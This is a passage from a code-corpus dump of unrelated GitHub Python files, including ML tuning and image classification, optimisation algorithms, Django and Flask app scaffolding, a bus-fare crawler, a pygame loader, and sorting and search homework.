# candidate values for the number of trees\r\nn_estimators_options=list(range(100,400,5))\r\n\r\nmax_depth_options=list(range(39,55,1))\r\nmin_samples_split_options=list(range(2,50,2))\r\nmax_leaf_nodes_options=list(range(1,50,4))\r\nrandomstate_options=list(range(0,50,2))\r\nmin_samples_leaf_options=list(range(1,40,2))\r\n\r\nfor n_estimators_size in n_estimators_options:\r\n    for max_depth_size in max_depth_options:\r\n        clf = RandomForestClassifier(max_features=19,min_samples_leaf=8,n_estimators=265,max_depth=50 ,n_jobs=-1,criterion=\"gini\",oob_score=True,class_weight=\"balanced\")\r\n        clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n        q1=clf.predict(train11_test.iloc[:,0:50])\r\n# compute the F1 score\r\n        score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n        results1.append((max_depth_size ,np.mean(score_test)))\r\n# print the best parameter combination\r\nprint(max(results1, key=lambda x:x[1]))\r\nresults2=[]\r\nmax_features_options=list(range(37,51,2))\r\nfor max_features_size in max_features_options:\r\n    clf = RandomForestClassifier(max_features=29,min_samples_leaf=8,n_estimators=265,max_depth=50 ,n_jobs=-1,criterion=\"gini\",oob_score=True,class_weight=\"balanced\")\r\n    clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n    q1=clf.predict(train11_test.iloc[:,0:50])\r\n# compute the F1 score\r\n    score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n    results2.append((max_features_size ,np.mean(score_test)))\r\n\r\nresults3=[]\r\nmin_samples_leaf_options=list(range(2,30,2))\r\nfor min_samples_leafs in min_samples_leaf_options:\r\n    clf = RandomForestClassifier(min_samples_leaf=4,max_features=29,n_estimators=265,max_depth=50 ,n_jobs=-1,criterion=\"gini\",oob_score=True,class_weight=\"balanced\")\r\n    clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n    q1=clf.predict(train11_test.iloc[:,0:50])\r\n# compute the F1 score\r\n    score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n    results3.append((min_samples_leafs ,np.mean(score_test)))\r\n    \r\nresults1=[]\r\nmin_samples_split_options=list(range(2,100,2))\r\nfor min_samples_splits in min_samples_split_options:\r\n    clf = RandomForestClassifier(min_samples_leaf=4,min_samples_split=min_samples_splits,max_features=29,\r\n                                 n_estimators=265,max_depth=50 ,n_jobs=-1,\r\n                                 criterion=\"gini\",oob_score=True,class_weight=\"balanced\",random_state=4,bootstrap=True)\r\n    clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n    q1=clf.predict(train11_test.iloc[:,0:50])\r\n# compute the F1 score\r\n    score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n    results1.append((min_samples_splits ,np.mean(score_test)))\r\n# print the best parameter combination\r\nprint(max(results1, key=lambda x:x[1]))\r\n\r\n    ","repo_name":"Gang1997/Astronomy-mining-contest","sub_path":"tune.py","file_name":"tune.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41734731749","text":"import random\nimport numpy as np\nfrom helper import getCostOfRoute\n\ndef initialize_bat_population(graph, population_size):\n    bats = []\n    for _ in range(population_size):\n        bat = list(range(len(graph)))\n        random.shuffle(bat)\n        bats.append(bat)\n    return bats\n\ndef update_velocity(bats, velocities, best_bat, graph, alpha):\n    for i in range(len(bats)):\n        velocities[i] = (np.array(velocities[i]) + 
alpha * (np.array(best_bat) - np.array(bats[i]))).tolist()\n\ndef update_position(bats, velocities):\n for i in range(len(bats)):\n for j in range(len(bats[i])):\n r = random.random()\n if r < abs(velocities[i][j]):\n swap_idx = int((j + abs(velocities[i][j])) % len(bats[i]))\n bats[i][j], bats[i][swap_idx] = bats[i][swap_idx], bats[i][j]\n\ndef local_search(bat, graph):\n i, j = random.sample(range(len(bat)), 2)\n new_bat = bat.copy()\n new_bat[i], new_bat[j] = new_bat[j], new_bat[i]\n if getCostOfRoute(new_bat, graph) < getCostOfRoute(bat, graph):\n return new_bat\n return bat\n\ndef bat_algorithm(graph, population_size, max_iter, alpha):\n bats = initialize_bat_population(graph, population_size)\n velocities = [[0 for _ in range(len(graph))] for _ in range(population_size)]\n best_bat = min(bats, key=lambda x: getCostOfRoute(x, graph))\n\n # Initialize the cost history\n cost_history = []\n\n for _ in range(max_iter):\n update_velocity(bats, velocities, best_bat, graph, alpha)\n update_position(bats, velocities)\n\n for i in range(len(bats)):\n bats[i] = local_search(bats[i], graph)\n\n current_best_bat = min(bats, key=lambda x: getCostOfRoute(x, graph))\n current_best_cost = getCostOfRoute(current_best_bat, graph)\n cost_history.append(current_best_cost)\n\n if current_best_cost < getCostOfRoute(best_bat, graph):\n best_bat = current_best_bat\n\n return best_bat, cost_history","repo_name":"Blaze10/AI","sub_path":"Nature-Inspired Algorithms A Comparative Study/bat_algorithm.py","file_name":"bat_algorithm.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31972592462","text":"import core.forms\nimport core.models\nfrom core.views.crud_view_methods import (\n create_methods,\n delete_methods,\n detail_methods,\n list_methods,\n update_methods,\n)\nfrom core.views.crud_view_methods.model_view_generic import (\n GenericDeleteView,\n GenericModelEdit,\n GenericModelList,\n GenericModelView,\n)\nfrom core.views.user_views import SelectLabMixin\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import CreateView, DeleteView, FormView, UpdateView\n\n\nclass LoginRequired(LoginRequiredMixin):\n login_url = \"/\"\n redirect_field_name = \"redirect_to\"\n\n\ndef create_list_view(model_name, methods):\n globals()[model_name + \"List\"] = type(\n model_name + \"List\",\n tuple([LoginRequired, SelectLabMixin, GenericModelList]),\n methods,\n )\n\n\ndef create_create_view(model_name, methods):\n globals()[model_name + \"Create\"] = type(\n model_name + \"Create\",\n tuple([LoginRequired, SelectLabMixin, GenericModelEdit, CreateView]),\n methods,\n )\n\n\ndef create_update_view(model_name, methods):\n globals()[model_name + \"Update\"] = type(\n model_name + \"Update\",\n tuple([LoginRequired, SelectLabMixin, GenericModelEdit, UpdateView]),\n methods,\n )\n\n\ndef create_delete_view(model_name, methods):\n globals()[model_name + \"Delete\"] = type(\n model_name + \"Delete\",\n tuple([LoginRequired, SelectLabMixin, GenericDeleteView]),\n methods,\n )\n\n\ndef create_detail_view(model_name, methods):\n globals()[model_name + \"View\"] = type(\n model_name + \"View\",\n tuple([LoginRequired, SelectLabMixin, GenericModelView]),\n methods,\n )\n\n\nfor model_name, methods_list in list_methods.methods.items():\n create_list_view(model_name, methods_list)\n\nfor model_name, 
methods_list in create_methods.methods.items():\n    create_create_view(model_name, methods_list)\n\nfor model_name, methods_list in detail_methods.methods.items():\n    create_detail_view(model_name, methods_list)\n\nfor model_name, methods_list in delete_methods.methods.items():\n    create_delete_view(model_name, methods_list)\n\nfor model_name, methods_list in update_methods.methods.items():\n    create_update_view(model_name, methods_list)\n","repo_name":"darkreactions/ESCALATE","sub_path":"escalate/core/views/crud_views.py","file_name":"crud_views.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"} +{"seq_id":"32572954732","text":"#!/usr/bin/env python\n#\n# -*- mode:python; sh-basic-offset:4; indent-tabs-mode:nil; coding:utf-8 -*-\n# vim:set tabstop=4 softtabstop=4 expandtab shiftwidth=4 fileencoding=utf-8:\n#\n\nimport sys\nimport suites\nimport unittest\n\n\ndef test_suites():\n    allsuites = []\n    for s in (\n        suites.coding_style,\n        suites.shell_docs,\n    ):\n        allsuites.append(s.test_cases())\n    alltests = unittest.TestSuite(allsuites)\n    return alltests\n\n\ndef main():\n    runner = unittest.TextTestRunner(verbosity=2)\n    result = runner.run(test_suites())\n    return (len(result.errors) + len(result.failures)) > 0\n\n\nif __name__ == '__main__':\n    sys.exit(main())\n","repo_name":"clusto/clusto-apiserver","sub_path":"tests/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"38011734000","text":"import megabus_request\r\nimport megabus_record\r\nimport megabus_analyze\r\nimport megabus_display\r\nimport megabus_date\r\n\r\n#working database of prices.\r\nweek_days = {\r\n    # outbound prices\r\n    'outbound': {\r\n    'monday':[25,23,25],\r\n    'tuesday':[] ,\r\n    'wednesday':[],\r\n    'thursday':[],\r\n    'friday': [],\r\n    'saturday':[],\r\n    'sunday':[],\r\n    },\r\n    'inbound':{\r\n    'imonday' : [],\r\n    'ituesday' : [],\r\n    'iwednesday' :[],\r\n    'ithursday' : [],\r\n    'ifriday' : [],\r\n    'isaturday' : [],\r\n    'isunday' :[],}\r\n    }\r\n\r\n\r\nmegabus_display.run_mainSpider()\r\n#origin = input('From: ')\r\n#destination = input('Destination: ')\r\ncrawling = megabus_date.Date()\r\ncrawling_date, crawling_day = crawling.format_date(), crawling.day_of_the_week()\r\nurl = megabus_request.format('New York, ny', 'Boston, MA', crawling_date)\r\n\r\n\r\n# Displays a summary of the trip that is being searched\r\n#2megabus.params_message(html)\r\n\r\ndaysSpan = 90\r\n\r\n\r\n# collect data\r\nfor number in range(0,daysSpan):\r\n    print(crawling)\r\n    if crawling_date == -1:\r\n        crawling.increment_month()\r\n        daysSpan = daysSpan + 1\r\n        continue\r\n    outbound = megabus_record.record_trips(url, 'outbound', crawling_day, week_days)\r\n    inbound = megabus_record.record_trips(url,'inbound', crawling_day, week_days)\r\n    crawling.increment_day()\r\n    crawling_day = crawling.day_of_the_week()\r\n\r\n# Resets dates to compare data\r\ncrawling = megabus_date.Date()\r\ncrawling_day = crawling.day_of_the_week()\r\ndaysSpan = 90\r\n\r\nfor number in range(0,daysSpan):\r\n    if crawling_date == None:\r\n        crawling.increment_month()\r\n        daysSpan = daysSpan + 1\r\n        continue\r\n    outbound = megabus_analyze.compare_trip_prices(url, 'outbound', crawling_day, week_days)\r\n    inbound = megabus_analyze.compare_trip_prices(url,'inbound', crawling_day, week_days)\r\n    crawling.increment_day()\r\n    crawling_day = 
crawling.day_of_the_week()\r\n\r\n\r\n\r\nprint(week_days)\r\n\r\n\r\n# Display\r\n# Request information\r\n# Records information\r\n# Reads information\r\n# Analyze information","repo_name":"GregBorrelly/MegabusWebCrawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"13775385370","text":"from turtle import Turtle\n\nFONT = (\"Courier\", 24, \"normal\")\n\n\n# displays the current level in the upper left of the screen f\"Level: {level_number}\"\n# and GAME OVER when the game has ended.\n\nclass Scoreboard(Turtle):\n    def __init__(self):\n        super().__init__()\n        self.color(\"black\")\n        self.penup()\n        self.hideturtle()\n        self.level_number = 0\n        self.update_level()\n\n    
def update_level(self):\n        self.clear()\n        self.level_number += 1\n        self.goto(-230, 260)\n        self.write(f\"Level: {self.level_number}\", align=\"center\", font=FONT)\n\n    def game_over(self):\n        self.goto(0,0)\n        self.write(\"GAME OVER\", align=\"center\", font=FONT)\n","repo_name":"waterseeker/100DaysOfCodePython","sub_path":"Day23/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36171924726","text":"import os\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\n\n\ndb = SQLAlchemy()\n\n\ndef create_app():\n\n    app = Flask(__name__)\n\n    app.config['SECRET_KEY'] = os.getenv(\"SECRET_KEY\")\n    app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv(\"SQLALCHEMY_DATABASE_URI\")\n    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n    db.init_app(app)\n\n    login_manager = LoginManager()\n    login_manager.login_view = \"auth.login\"\n    login_manager.login_message_category = \"danger\"\n    login_manager.init_app(app)\n\n    from .models import User, Books\n\n    @login_manager.user_loader\n    def load_user(user_id):\n        return User.query.get(int(user_id))\n\n    from .main import main as main_blueprint\n    app.register_blueprint(main_blueprint)\n\n    from .auth import auth as auth_blueprint\n    app.register_blueprint(auth_blueprint)\n\n    from .book import book as book_blueprint\n    app.register_blueprint(book_blueprint)\n\n    from .api import api as api_blueprint\n    app.register_blueprint(api_blueprint)\n\n    with app.app_context():\n        db.create_all()\n    return app\n","repo_name":"gomezlucas/BookEdx","sub_path":"application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73436114604","text":"import pygame, sys, os\nfrom pygame.locals import *\n\n# Content Manager\nclass Content:\n    # Builds a Content Manager to a relative path\n    def __init__(self, path):\n        self.path = path\n\n    # Tries to load an image\n    # colorkey: -1, (255,255,255), None\n    def load_image(self, name, colorkey=None, scale=1,):\n        fullname = os.path.join(self.path, name)\n        try:\n            image = pygame.image.load(fullname)\n        except pygame.error as message:\n            print(\"Cannot load image:\", name)\n            raise SystemExit(message)\n        # Apply color key\n        image = image.convert()\n        if colorkey is not None:\n            if colorkey == -1:\n                colorkey = image.get_at((0,0))\n            image.set_colorkey(colorkey, RLEACCEL)\n        \n        # Scale image\n        if scale == 2:\n            image = pygame.transform.scale2x(image)\n        elif scale > 2:\n            width = image.get_width()* scale\n            height = image.get_height() * scale\n            image = pygame.transform.smoothscale(image, (width, height)) \n        \n        return image\n\n    # Tries to load a sound\n    def load_sound(self, name):\n        class NoneSound:\n            def play(self): pass\n        if not pygame.mixer:\n            return NoneSound()\n        fullname = os.path.join(self.path, name)\n        try:\n            sound = pygame.mixer.Sound(fullname)\n        except pygame.error as message:\n            print(\"Cannot load sound:\", name)\n            raise SystemExit(message)\n        return sound\n\n    # Loads a set of images\n    def load_images(self, array):\n        images = []\n        for item in array:\n            if len(item) == 1:\n                images.append(self.load_image(item[0]))\n            else:\n                images.append(self.load_image(item[0], item[1]))\n        return 
images\n","repo_name":"dacanizares/CafeinaRobot","sub_path":"cafeinagame/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"8207195739","text":"# ДЗ*:\n# 1. Написать функцию binary_search, принимающую в качестве входящего\n# параметра элемент для поиска и список в котором необходимо искать.\n# 2. Алгоритм должен искать с помощью двоичного поиска,\n# изображенного на блок-схеме презентации.\n# 3. Функция в итоге должна распечатать результат. Применить 1 раз эту функцию\n# 4. Написать функцию buble_sort или selection_sort,\n# принимающую в качестве входящего параметра не отсортированный список.\n# 5. Алгоритм функции должен сортировать список методом пузырьковой\n# сортировки или методом сортировки выбором.\n# 6. Функция в итоге должна возвращать отсортированный список.\n# Применить 1 раз данную функцию\n\ndef binary_search(spisok, n): \n spisok = [1,2,3,4,5,6,7,8,9,12,17,85,23,28,33,35,39,40,47,46,56,66,67,90]\n left = -1 \n right = len(spisok) \n while right > left + 1: \n middle = (left + right) // 2 \n if spisok[middle] >= n: \n right = middle \n else: \n left = middle \n return right\n\nprint(binary_search(spisok=[1,2,3,4,5,6,7,8,9,12,17,19,23,28,33,35,39,40,47,46,56,66,67,90] , n=40))\n\n\n\n\n\ndef buble_sort (list):\n\n done = False\n while not done:\n done = True\n for i in range(len(list)-1):\n if list[i] > list[i+1]:\n list[i], list[i+1] = list[i+1], list[i]\n done = False\n print(list)\nprint(buble_sort(list = [33,67,23,59,90,77,35,45]))","repo_name":"Aiba0709/Ubuntu","sub_path":"2-курс/homework7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1842230644","text":"# import custom modules\nimport sys\nsys.path.insert(0, \"src/util\")\nsys.path.insert(0, \"src/data_util\")\n\n# imports\nimport torch\nimport torchvision\n\nimport copy\nimport torch.optim as optim\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.checkpoint as cp\nfrom torchvision import datasets, models, transforms\nfrom sklearn.metrics import f1_score\nimport os\n\nfrom nbdt.model import SoftNBDT\nfrom nbdt.model import HardNBDT\nfrom nbdt.loss import SoftTreeSupLoss\nfrom nbdt.loss import HardTreeSupLoss\n\nfrom write_to_json import *\n\ndef train_model(model, dataloaders, criterion, optimizer, num_epochs=25):\n '''\n trains model by using train and validation sets\n '''\n # define lists\n best_model_wts = copy.deepcopy(model.state_dict())\n best_fscore = 0.0\n \n loss_train_evo=[]\n acc_train_evo=[]\n fs_train_evo=[]\n \n loss_val_evo=[]\n acc_val_evo=[]\n fs_val_evo=[] \n \n # Detect if we have a GPU available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n \n print('---> Begin model training...')\n for epoch in range(num_epochs):\n i = 0\n print('Epoch {}/{}'.format(epoch+1, num_epochs))\n\n # determine if in train or validation phase\n for phase in ['train_snakes_r1', 'valid_snakes_r1']:\n if phase == 'train_snakes_r1':\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n \n running_loss = 0.0\n running_corrects = 0\n fscore = []\n\n # iterate over data\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients before beginning backprop\n 
optimizer.zero_grad()\n\n                # forward\n                # track history if only in train\n\n                with torch.set_grad_enabled(phase == 'train_snakes_r1'):\n                    # calculate loss from model outputs\n                    outputs = model(inputs)\n                    loss = criterion(outputs, labels)\n                    _, preds = torch.max(outputs, 1)\n\n                    # backward + optimize only if in training phase\n                    if phase == 'train_snakes_r1':\n                        loss.backward()\n                        optimizer.step()\n\n                # statistics\n                labels_cpu = labels.cpu().numpy()\n                predictions_cpu = preds.cpu().numpy()\n                Fscore = f1_score(labels_cpu, predictions_cpu, average='macro')\n                fscore.append(Fscore)\n                running_loss += loss.item() * inputs.size(0)\n                running_corrects += torch.sum(preds == labels.data)\n\n            epoch_loss = running_loss / len(dataloaders[phase].dataset)\n            epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)\n            epoch_fscore = np.average(np.array(fscore))\n            \n            print('{} Loss: {:.4f} Acc: {:.4f} F: {:.3f}'.format(phase, epoch_loss, epoch_acc, epoch_fscore))\n            \n            if phase == 'train_snakes_r1':\n                loss_train_evo.append(epoch_loss)\n                epoch_acc = epoch_acc.cpu().numpy()\n                acc_train_evo.append(epoch_acc)\n                fs_train_evo.append(epoch_fscore)                \n            else:\n                loss_val_evo.append(epoch_loss)\n                epoch_acc = epoch_acc.cpu().numpy()\n                acc_val_evo.append(epoch_acc)\n                fs_val_evo.append(epoch_fscore)                \n            \n            # deep copy the model\n            if phase == 'valid_snakes_r1' and epoch_fscore > best_fscore:\n                best_acc = epoch_acc\n                best_fscore = epoch_fscore\n                best_model_wts = copy.deepcopy(model.state_dict())\n\n    # load best model weights\n    model.load_state_dict(best_model_wts)\n    \n    print(\"---> Finished model training.\")\n    \n    return model, loss_train_evo, acc_train_evo, fs_train_evo, loss_val_evo, acc_val_evo, fs_val_evo\n\ndef set_parameter_requires_grad(model, feature_extracting):\n    '''\n    sets the .requires_grad attribute of the parameters in the model to False when we are feature extracting\n    '''\n    if feature_extracting:\n        for param in model.parameters():\n            param.requires_grad = False\n    \ndef initialize_model(model_name, num_classes, feature_extract, use_pretrained=True):\n    '''\n    initializes pretrained vgg model\n    '''\n    print(\"---> Begin model initialization...\")\n    ft_extract = False\n    if feature_extract == \"True\":\n        ft_extract=True\n\n    model_ft = models.densenet121(pretrained=use_pretrained)\n    set_parameter_requires_grad(model_ft, ft_extract)\n    num_ftrs = model_ft.classifier.in_features\n    model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n    input_size = 224\n\n    print(\"---> Finished model initialization.\")\n    \n    return model_ft, input_size\n\ndef create_dataloaders(DATA_DIR, batch_size, input_size):\n    '''\n    return model transformations for training and validation sets\n    '''\n    print(\"---> Begin dataloader creation...\")\n    \n    data_transforms = {\n        'train_snakes_r1': transforms.Compose([\n            transforms.RandomResizedCrop(input_size),\n            transforms.RandomHorizontalFlip(),\n            transforms.RandomRotation([0, 90]),\n            transforms.ToTensor(),\n            transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n        ]),\n        'valid_snakes_r1': transforms.Compose([\n            transforms.RandomResizedCrop(input_size),\n            transforms.RandomHorizontalFlip(),\n            transforms.RandomRotation([0, 90]),\n            transforms.ToTensor(),\n            transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n        ]),\n    }    \n    \n    # Create training and validation datasets\n    image_datasets = {\n        x: datasets.ImageFolder(os.path.join(DATA_DIR, x), data_transforms[x]) for x in [\n            'train_snakes_r1',\n            'valid_snakes_r1']  \n    }\n    \n    # Create training and validation dataloaders\n    dataloaders_dict = {\n        x: 
torch.utils.data.DataLoader(\n image_datasets[x],\n batch_size=batch_size,\n shuffle=True,\n num_workers=4\n ) for x in [\n 'train_snakes_r1',\n 'valid_snakes_r1'\n ]\n }\n print(\"---> Finished creating dataloaders.\")\n \n return dataloaders_dict, len(image_datasets['train_snakes_r1'].classes)\n\ndef params_to_update(model_ft, feature_extract):\n '''\n defines params to update for optimizer, based on feature extract\n '''\n ft_extract = False\n if feature_extract == \"True\":\n ft_extract=True\n \n params_to_update = model_ft.parameters()\n if ft_extract:\n params_to_update = []\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n params_to_update.append(param)\n # print(\"\\t\",name)\n else:\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n a=1 # print(\"\\t\",name)\n \n return params_to_update\n\ndef run_model(data_cfg, model_cfg, criterion):\n '''\n Runs model based on parameters from data_cfg and model_cfg. Additionally, writes best model's weights to a path in config\n '''\n \n # create dataloaders\n dataloaders_dict, num_classes = create_dataloaders(\n data_cfg['dataDir'],\n model_cfg['batchSize'],\n model_cfg['inputSize']\n )\n \n # Detect if we have a GPU available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Initialize the model for this run\n model_ft, input_size = initialize_model(\n model_cfg['modelName'],\n num_classes,\n feature_extract = model_cfg['featureExtract'],\n use_pretrained=True\n )\n\n model_ft = model_ft.to(device) # make model use GPU\n\n params_update = params_to_update(model_ft, model_cfg['featureExtract'])\n\n # Optimizer\n optimizer_ft = optim.Adam(params_update, lr=model_cfg['lr'])\n \n # train model\n model_ft, loss_train, acc_train, fs_train, loss_val, acc_val, fs_val = train_model(\n model_ft,\n dataloaders_dict,\n criterion,\n optimizer = optimizer_ft,\n num_epochs = model_cfg['nEpochs'])\n \n # save model\n save_model(model_ft, data_cfg, model_cfg)\n \n return model_ft, loss_train, acc_train, fs_train, loss_val, acc_val, fs_val \n \ndef save_model(model_ft, data_cfg, model_cfg):\n '''\n saves weights of a passed model\n '''\n # save model to model states in params\n now = datetime.now().strftime(\"%d%m%Y_%H:%M\")\n model_path = os.path.join(data_cfg['dataDir'], \"model_states\")\n model_name = os.path.join(\n model_path, \n \"{}_{}_{}.pth\".format(\n now,\n model_cfg['nEpochs'],\n model_cfg['modelName']\n )\n )\n if not os.path.isdir(model_path): # make sure model path is made\n print(\"---> Creating {}\".format(model_path))\n os.mkdir(model_path)\n \n # saves model\n print('---> saving model at {}/{}'.format(model_path, model_name))\n torch.save(model_ft.state_dict(), model_name)\n \n \ndef run_nbdt(data_cfg, model_cfg, loss_type):\n '''\n Runs nbdt \n '''\n # check to make sure loss_type is specified\n assert (\n loss_type in [\"SoftTreeSupLoss\", \"HardTreeSupLoss\"]\n ), \"Please specify SoftTreeSupLoss or HardTreeSupLoss\"\n \n # create dataloaders\n dataloaders_dict, num_classes = create_dataloaders(\n data_cfg['dataDir'],\n model_cfg['batchSize'],\n model_cfg['inputSize']\n )\n \n # Detect if we have a GPU available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Initialize the model for this run\n model, input_size = initialize_model(\n model_cfg['modelName'],\n num_classes,\n feature_extract = model_cfg['featureExtract'],\n use_pretrained=True\n ) \n \n # load model weights\n if loss_type == 
\"SoftTreeSupLoss\":\n model_weights = torch.load(data_cfg['hierarchyModelPath'])\n elif loss_type == \"HardTreeSupLoss\":\n model_weights = torch.load(data_cfg['hierarchyModelPath'])\n \n model = model.to(device) # make model use GPU\n model.load_state_dict(model_weights)\n \n # create NBDT\n print('---> Creating NBDT...')\n if loss_type == \"SoftTreeSupLoss\":\n model = SoftNBDT(\n model = model,\n dataset = 'snakes', \n hierarchy='induced-densenet121',\n path_graph = os.path.join(data_cfg['hierarchyPath'], data_cfg['hierarchyJSON']),\n path_wnids = data_cfg['wnidPath']\n )\n else:\n model = HardNBDT(\n model = model,\n dataset = 'snakes', \n hierarchy='induced-densenet121',\n path_graph = os.path.join(data_cfg['hierarchyPath'], data_cfg['hierarchyJSON']),\n path_wnids = data_cfg['wnidPath']\n )\n print('---> Finished creating NBDT.')\n \n model.eval()\n\n running_corrects = 0\n fscore = []\n\n print('---> Running inference...')\n # iterate over data\n for inputs, labels in dataloaders_dict['valid_snakes_r1']:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n with torch.no_grad():\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n\n # statistics\n labels_cpu = labels.cpu().numpy()\n predictions_cpu = preds.cpu().numpy()\n Fscore = f1_score(labels_cpu, predictions_cpu, average='macro')\n fscore.append(Fscore)\n running_corrects += torch.sum(preds == labels.data)\n print('---> Finished running inference...')\n \n epoch_acc = running_corrects.double() / len(dataloaders_dict['valid_snakes_r1'].dataset)\n epoch_fscore = np.average(np.array(fscore))\n \n print(\" \")\n print('{} Acc: {:.4f} F1: {:.4f}'.format('NBDT Test', epoch_acc, epoch_fscore))\n print(\" \")","repo_name":"nikolettuce/SnakeClassification_NeuralBackedDecisionTrees","sub_path":"src/model/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":12228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"74241585004","text":"# https://py.checkio.org/ru/mission/color-map/\n# my solution\n# not sure if it's the right solution\n\ndef color_map(region):\n n, m, graph, vertices = len(region), len(region[0]), dict(), set()\n for line in region:\n vertices = vertices | set(line)\n for vertex in vertices:\n graph[vertex] = set()\n\n def cell(row, col):\n return region[row][col] if 0 <= row < n and 0 <= col < m else None\n\n def add_edge(v1, v2):\n if v2 is not None and v1 != v2:\n graph[v1].add(v2)\n graph[v2].add(v1)\n\n for i in range(n):\n for j in range(m):\n vertex, right_neighbor, bottom_neighbor = region[i][j], cell(i, j + 1), cell(i + 1, j)\n add_edge(vertex, right_neighbor)\n add_edge(vertex, bottom_neighbor)\n\n def dfs(vert, clr):\n used.add(vert)\n if not colored_vertices[vert] and all((colored_vertices[neighbor] != clr for neighbor in graph[vert])):\n colored_vertices[vert] = clr\n for neighbor in graph[vert]:\n if neighbor not in used:\n dfs(neighbor, clr)\n\n colored_vertices = {vertex: None for vertex in vertices}\n for color in range(1, 5):\n used = set()\n for vertex in vertices:\n if not colored_vertices[vertex]:\n dfs(vertex, color)\n\n return list(colored_vertices.values())\n\n\ndef color_graph(g):\n def dfs(vert, clr):\n used.add(vert)\n if not colored_vertices[vert] and all((colored_vertices[neighbor] != clr for neighbor in g[vert])):\n colored_vertices[vert] = clr\n for neighbor in g[vert]:\n if neighbor not in used:\n dfs(neighbor, clr)\n\n colored_vertices = {vertex: None for vertex in g}\n for color in range(1, 
5):\n used = set()\n for vertex in g:\n if not colored_vertices[vertex]:\n dfs(vertex, color)\n\n return list(colored_vertices.values())\n\n\n# best clear solution\n# https://py.checkio.org/mission/color-map/publications/DiZ/python-3/borders/?ordering=most_voted&filtering=all\ndef color_map_bc(colored_map):\n # Construct all regions\n regions = {}\n for i, line in enumerate(colored_map):\n for j, cell in enumerate(line):\n regions.setdefault(cell, set()).add(i + 1j * j)\n\n # Get neighbours for all regions\n neighbours = {}\n for region, cells in regions.items():\n border = set.union(*({c + 1j ** k for k in range(4)} for c in cells)) - cells\n neighbours[region] = {r for r, c in regions.items() if border & c}\n\n # Color each region with first available color\n c, colors = 0, [0] * len(regions)\n while c < len(regions):\n variants = set(range(colors[c] + 1, 5)) - {colors[n] for n in neighbours[c]}\n colors[c] = len(variants) and min(variants)\n c += 2 * bool(variants) - 1\n return colors\n\n\ndef test0():\n v_s = set()\n r = ((5, 2, 3, 1, 1, 1, 1, 1, 1),\n (0, 2, 2, 2, 2, 2, 2, 1, 4),\n (0, 2, 2, 2, 4, 4, 4, 4, 4),\n (0, 6, 6, 7, 8, 8, 8, 8, 8),\n (0, 7, 7, 7, 7, 8, 8, 8, 8))\n\n for rw in r:\n v_s = v_s | set(rw)\n\n print(v_s)\n print(color_map(r))\n\n\ndef test1():\n print(color_map(((0, 0, 0, 1, 4, 4, 4, 4, 4),\n (0, 1, 1, 1, 3, 3, 3, 3, 4),\n (0, 1, 1, 3, 3, 6, 5, 3, 4),\n (1, 1, 1, 3, 2, 6, 5, 5, 9),\n (1, 1, 1, 2, 2, 6, 6, 6, 9),\n (7, 8, 9, 9, 9, 9, 9, 9, 9),\n (7, 8, 8, 8, 8, 8, 